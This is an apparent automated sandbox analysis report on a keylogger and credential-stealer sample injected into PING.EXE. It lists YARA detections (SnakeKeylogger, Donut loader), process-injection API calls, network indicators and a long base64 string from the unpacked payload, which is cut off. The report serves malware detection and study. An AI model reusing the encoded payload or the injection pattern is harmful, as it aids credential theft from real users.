Source: PING.EXE, 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.00000000044A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: PING.EXE, 00000008.00000002.3328916486.0000000004601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: PING.EXE, 00000008.00000002.3328916486.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004597000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: PING.EXE, 00000008.00000002.3328916486.00000000045A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 58073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58059
Source: unknown	Network traffic detected: HTTP traffic on port 58067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58067
Source: unknown	Network traffic detected: HTTP traffic on port 58061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58073
Source: unknown	Network traffic detected: HTTP traffic on port 58063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58070

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:58075 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000008.00000002.3327175771.0000000000770000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.991277571.000001BEBEC8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large strings

Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.cs	Long String: Length: 48464
Source: 2.2.powershell.exe.1bed4be0000.1.raw.unpack, cdXfw.cs	Long String: Length: 48464
Source: ilgwppf0.dll.9.dr, cdXfw.cs	Long String: Length: 48464

Source: C:\Windows\SysWOW64\PING.EXE

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF936876F3D NtCreateThreadEx,		2_2_00007FF936876F3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF936876E11 NtWriteVirtualMemory,		2_2_00007FF936876E11

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF936943E90	2_2_00007FF936943E90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF936941ADC	2_2_00007FF936941ADC
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_00777A74	8_2_00777A74
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_0077521C	8_2_0077521C
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_00773080	8_2_00773080
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_00773F74	8_2_00773F74
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_0077477C	8_2_0077477C
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_00774344	8_2_00774344
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DC670	8_2_068DC670
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DE5F0	8_2_068DE5F0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D53A7	8_2_068D53A7
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DC3A2	8_2_068DC3A2
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DC0D2	8_2_068DC0D2
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DCEE0	8_2_068DCEE0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DCC10	8_2_068DCC10
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DBC38	8_2_068DBC38
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DC942	8_2_068DC942
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DF5DC	8_2_068DF5DC
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DE5E0	8_2_068DE5E0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D4268	8_2_068D4268
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DA0F8	8_2_068DA0F8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D7038	8_2_068D7038
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D2E54	8_2_068D2E54
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D6A00	8_2_068D6A00
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068DFA20	8_2_068DFA20
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F48B58	8_2_06F48B58
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F47720	8_2_06F47720
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F47D78	8_2_06F47D78
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4F958	8_2_06F4F958
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F422F1	8_2_06F422F1
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4A6E8	8_2_06F4A6E8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F44ED0	8_2_06F44ED0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4A6D8	8_2_06F4A6D8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F472C8	8_2_06F472C8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F472CA	8_2_06F472CA
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4E2A0	8_2_06F4E2A0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F41EA8	8_2_06F41EA8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4E291	8_2_06F4E291
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F41E98	8_2_06F41E98
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F46E70	8_2_06F46E70
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F44A73	8_2_06F44A73
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F44A78	8_2_06F44A78
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4C278	8_2_06F4C278
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F46E60	8_2_06F46E60
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4C269	8_2_06F4C269
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F41A50	8_2_06F41A50
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4A250	8_2_06F4A250
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F41A40	8_2_06F41A40
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4A241	8_2_06F4A241
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F44620	8_2_06F44620
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F44622	8_2_06F44622
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F46A18	8_2_06F46A18
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4DE08	8_2_06F4DE08
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F46A09	8_2_06F46A09
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F48FF0	8_2_06F48FF0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F48FE0	8_2_06F48FE0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4EBD0	8_2_06F4EBD0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F45BD8	8_2_06F45BD8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4EBC1	8_2_06F4EBC1
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F45BCB	8_2_06F45BCB
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F42BB0	8_2_06F42BB0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F42BA3	8_2_06F42BA3
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4CBA8	8_2_06F4CBA8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4CB99	8_2_06F4CB99
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F45780	8_2_06F45780
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4AB80	8_2_06F4AB80
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F45782	8_2_06F45782
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4AB71	8_2_06F4AB71
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F42758	8_2_06F42758
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F42748	8_2_06F42748
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F48B49	8_2_06F48B49
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4E738	8_2_06F4E738
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F45328	8_2_06F45328
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4E728	8_2_06F4E728
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4C710	8_2_06F4C710
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F47711	8_2_06F47711
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F45318	8_2_06F45318
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F42300	8_2_06F42300
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4C701	8_2_06F4C701
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F408F0	8_2_06F408F0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4F4F1	8_2_06F4F4F1
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F408E1	8_2_06F408E1
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4D4D8	8_2_06F4D4D8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4D4C8	8_2_06F4D4C8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4B4B0	8_2_06F4B4B0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4B4A0	8_2_06F4B4A0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F40498	8_2_06F40498
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F49488	8_2_06F49488
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F40488	8_2_06F40488
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F49478	8_2_06F49478
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F43460	8_2_06F43460
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4F068	8_2_06F4F068
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4F058	8_2_06F4F058
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F40040	8_2_06F40040
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4D040	8_2_06F4D040
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F46030	8_2_06F46030
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4D030	8_2_06F4D030
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F46020	8_2_06F46020
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4B018	8_2_06F4B018
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F40007	8_2_06F40007
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F43007	8_2_06F43007
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F43008	8_2_06F43008
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4B008	8_2_06F4B008
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F415F8	8_2_06F415F8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4DDF9	8_2_06F4DDF9
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4BDE0	8_2_06F4BDE0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4BDD1	8_2_06F4BDD1
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F465C0	8_2_06F465C0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F441C8	8_2_06F441C8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F49DB8	8_2_06F49DB8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F441B8	8_2_06F441B8
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F465BB	8_2_06F465BB
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F411A0	8_2_06F411A0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F49DA9	8_2_06F49DA9
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4D970	8_2_06F4D970
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4D961	8_2_06F4D961
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F40D48	8_2_06F40D48
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4B948	8_2_06F4B948
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4F948	8_2_06F4F948
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F40D38	8_2_06F40D38
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4B938	8_2_06F4B938
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F49920	8_2_06F49920
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F49910	8_2_06F49910
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_06F4F500	8_2_06F4F500

Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000008.00000002.3327175771.0000000000770000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.991277571.000001BEBEC8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 8.2.PING.EXE.6900000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.PING.EXE.6900000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.PING.EXE.6900000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.cs	Base64 encoded string: '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
